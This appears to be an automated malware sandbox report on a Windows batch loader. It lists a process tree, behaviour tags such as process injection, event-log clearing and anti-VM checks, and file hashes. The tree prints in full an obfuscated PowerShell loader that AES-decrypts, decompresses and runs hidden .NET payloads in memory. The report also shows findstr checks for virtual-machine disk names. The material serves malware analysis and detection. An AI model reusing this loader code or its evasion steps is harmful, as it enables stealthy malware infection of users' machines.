to memory of 3572 3708 dllhost.exe 56 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1028
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{24b9a0ea-28ed-4863-963a-510c1a22a860}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3708
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7c99463e-22cf-4fb0-a8f2-243f273f3c0e}2⤵PID:5096
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:420
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1232 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2184
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1584
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2708
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1320
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2136
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2252
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2828
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2840
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2884
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3572
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3668 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.cmd"2⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3644
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:648
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"3⤵PID:1688
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:772
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"3⤵PID:3912
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Users\Admin\AppData\Local\Temp\Loader.cmd';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));3⤵PID:3192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3500 -s 25764⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5096
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loader.cmd>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
PID:1436 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵PID:1116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4852
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:3612
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"5⤵PID:2684
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:2532
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"5⤵PID:3156
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));5⤵PID:2000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:1092 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1092 -s 26086⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4632
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3816
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2088
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4184
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2876
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:348
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2348
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:1344
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3720
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:3096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1744
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca1⤵PID:1088
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2648
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 37b9a9c5e4f659e8bb1465c15422e4a1 4yIkIn2OAkSRIfjhMJ4uKg.0.1.0.0.01⤵
- Sets service image path in registry
PID:1008 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1924
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:1676
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:2084
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:3680
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2484 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 472 -p 3500 -ip 35002⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2148
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 1092 -ip 10922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4428
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38KB
MD59abb1e9464301e3fd701d1ee6698cc59
SHA1813dcd1519be51748920036bf231e2ce90eaf3eb
SHA256384b1137732cb97e99092a8942dcc4cfa054c8e625adbcb50fcce06b53fb35dc
SHA5121be2e5774b04c16a6544bd1af3f0d3796ed2faef6c42c7ab78f0b6ea245d6bb0fd8372652d0b52b574c9af370304ff506302edfc5aabbd922949ec7278780142
-
Filesize
13KB
MD5efff6b71856009a50e9b8f6a95f2b724
SHA1b0a8b17032097d47e45b46e85aeac23a8eb26ce8
SHA256a6de21b473cb7c38b9e89a4342c3d17f6ff11546e49b97c3ec4d97d7c85e6322
SHA5127449b98b5f5db70c79959681cbf22f96699181cf52b5fc486f5f0b1b6a4762f6b097281a072a0d543f8a74f2ddd0e5b8d465bd9904f7a55908882a3cce7e9e11
-
Filesize
39KB
MD587bc2cbd3e9fdd50711978cdbfd419da
SHA15f2fbdb6d131331cfed96541054f13d0bc9df736
SHA256d9550cb4b2ecaa2d712285ada51816b9bc49ff7345485fd760ee07e0518758f0
SHA51251ca18cc20cab59141d8d8de3c25d7c69722942e10f2473063c4fe27409f03376429801a010ac6becf8e248dd68bdf0cf00f1864b1d89532cae7b6c682c40525
-
Filesize
13KB
MD55a4a62a3146970603053b7b237fa2f22
SHA1b347c99a34effb3985affdbdf25685d57a7cbfc4
SHA256c2a4de7def7af66c6bde9f9cd52b4f45073a596749a3e76b43e829058c566974
SHA512214efd8be64e5b922242d0d137cb815a6d14173c89af5322ca4d5b15830e887cab637faa8fa93e8814084b444c6e15a1d818d89402327d14c4b0893ac298fa1e
-
Filesize
3KB
MD5a46bd86514843f080048e6a4cd1384c9
SHA16226fc42f4ebd5f7f94dc30992d4d56c95b0fbb5
SHA2560dd1b8a3849afa31ad3752fcab3c5db1e368ba71dec6689e5a3a85f5727296fa
SHA5124acc30cf38e6968a8eda0fbde2b34b01b538e5d5241d91a4d9c7beffa46b37cac8575762ab9d3d4f025826a22f80925054f580dcb0325f0334a480e788cb17bb
-
Filesize
54KB
MD568c69cb99e4a23e94ea7241565708e2d
SHA1e2c36da387387139c8893134bb0f2ad07eee7dbd
SHA256531569da3b8ece3ee52a647dfd8f8c627e60cc2fc10558f901d782e03f8581f0
SHA5124e45d2d393e0c0a2814006facc4ba5e23d40996e15630fdb3a398e7cbe962684a5f359ba62fc6e26d2adda09a8a0e375398119e425629450a465faa23ae13a59
-
Filesize
3KB
MD578e80508b1695ff58b333ee4499fd2a7
SHA13a059f025b5d238c8c5d5de870cc5bb7a4b8b3a9
SHA256b5a9ddbdbf48ee1870fdfc3eb4a7c6b3bb03bae38764cf0e58f8eee0c3ab4b3c
SHA5129335af49bec8ff50e042f706a588646d32313a524be719da7245d037a96a86f52eef48695ef47dcf4787cd30dbef7f1708c93f7156e6c49639298aad3eec29dc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7.3MB
MD51bec1098946595a03fa067a3ef7ce292
SHA189cfb4a2f8800f1b944d906d959639907672317d
SHA256a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
SHA512dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082
-
Filesize
3KB
MD5c6086d02f8ce044f5fa07a98303dc7eb
SHA16116247e9d098b276b476c9f4c434f55d469129c
SHA2568901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0
SHA5121876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a
-
Filesize
3KB
MD539b9eb9d1a56bc1792c844c425bd1dec
SHA1db5a91082fa14eeb6550cbc994d34ebd95341df9
SHA256acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692
SHA512255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51
-
Filesize
2KB
MD5a9124c4c97cba8a07a8204fac1696c8e
SHA11f27d80280e03762c7b16781608786f5a98ff434
SHA2568ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392
-
Filesize
2KB
MD54ac1741ceb19f5a983079b2c5f344f5d
SHA1f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA2567df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd